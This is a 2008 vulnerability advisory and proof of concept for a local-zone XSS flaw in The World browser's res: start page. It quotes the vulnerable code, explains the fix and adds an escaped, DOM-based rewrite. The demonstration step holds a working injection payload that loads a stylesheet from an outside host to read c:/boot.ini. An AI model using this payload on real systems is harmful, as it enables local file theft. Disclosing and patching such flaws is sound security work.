The World browser local-zone XSS / cross-domain vulnerability POC
  Added: 07/09/2008   Published: 07/09/2008
 
Vulnerability description: http://www.80sec.com/360-sec-browser-localzone-xss.html

  Document source: http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

  Vulnerability analysis: The World browser loads its start page through the res: protocol, as res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM. Because the res: protocol lacks the necessary security controls, that page runs with very high privileges, so an XSS flaw in it turns into a local cross-domain vulnerability. A brief analysis follows:

<script language="JavaScript">
var nOldCount = 0;
for (i = 0; i < g_nCountOld; i++)
{
  str_url = g_arr_argUrlOld[i];
  str_name = g_arr_argNameOld[i];
  str_td = "<tr ID='twOldItem" + i + "'><td valign='top' width='64'><div align='right'><a style='cursor:hand' title='Delete current item' onclick=\"javascript:tw_DeleteItemOld('" + i + "');\"><img border='0' src='twpage_delete.gif' width='16' height='16'></div></a></td>";
  document.write(str_td);
  // str_url and str_name are written into the markup with no escaping at all
  str_td = "<td><a target='_blank' href='" + str_url + "'>" + str_name + "</a></td></tr>";
  document.write(str_td);
  nOldCount = i;
  g_bHasLastUrl = true;
}
</script>

 

  str_name and str_url are output directly without any filtering. Because this page lives in the local security zone it has very high privileges, so script injected here can perform cross-domain operations, including reading local files and running local programs.

  Vulnerability fix:


  The fixed page now renders these items through JavaScript DOM manipulation instead of writing concatenated markup.
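The unfiltered concatenation from TWHOME.HTM beside a hardened render, as an added example that is not the advisory's or the browser vendor's code; the function names, the http/https allowlist and the constructed sample item are assumptions:

```javascript
// Vulnerable pattern from the advisory: url and name go into markup unfiltered.
function renderRowUnsafe(i, url, name) {
  return "<tr ID='twOldItem" + i + "'><td><a target='_blank' href='" +
         url + "'>" + name + "</a></td></tr>";
}

// Escape the characters that change meaning in HTML text and attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Assumed policy: only http/https history entries are linkable; res:, file: and
// script schemes are refused because this page itself runs in the local zone.
function isSafeUrl(url) {
  return /^https?:\/\//i.test(String(url).trim());
}

// Hardened string render: every attacker-influenced value is escaped and the
// href is allowlisted before it reaches the markup.
function renderRowSafe(i, url, name) {
  const href = isSafeUrl(url) ? url : 'about:blank';
  return "<tr id='twOldItem" + i + "'><td><a target='_blank' href='" +
         escapeHtml(href) + "'>" + escapeHtml(name) + "</a></td></tr>";
}

// DOM-based render, the approach the fix is described as taking: nodes are built
// with createElement/textContent, so the data is never parsed as HTML at all.
// `doc` is a Document (window.document in the browser); hypothetical helper.
function appendRowDom(doc, tbody, i, url, name) {
  const tr = doc.createElement('tr');
  tr.id = 'twOldItem' + i;
  const td = doc.createElement('td');
  const a = doc.createElement('a');
  a.target = '_blank';
  a.href = isSafeUrl(url) ? url : 'about:blank';
  a.textContent = name;          // text node, not markup
  td.appendChild(a);
  tr.appendChild(td);
  tbody.appendChild(tr);
  return tr;
}

// Constructed sample item: a history title that closes the attribute and adds a tag.
const sampleName = "Home'><i>injected</i>";
console.log('unsafe:', renderRowUnsafe(0, 'http://example.com/', sampleName));
console.log('safe:  ', renderRowSafe(0, 'http://example.com/', sampleName));
```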

  Vulnerability demonstration: the following test method can read c:/boot.ini.

  1. Open the following address:

sc:h'><script>alert(document.write(unescape("%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2f%2fwww.80sec.com/1.css%22%3E")))</script>


  2. The above will make the page inaccessible; then close the TW browser directly (unfortunately it crashes).

 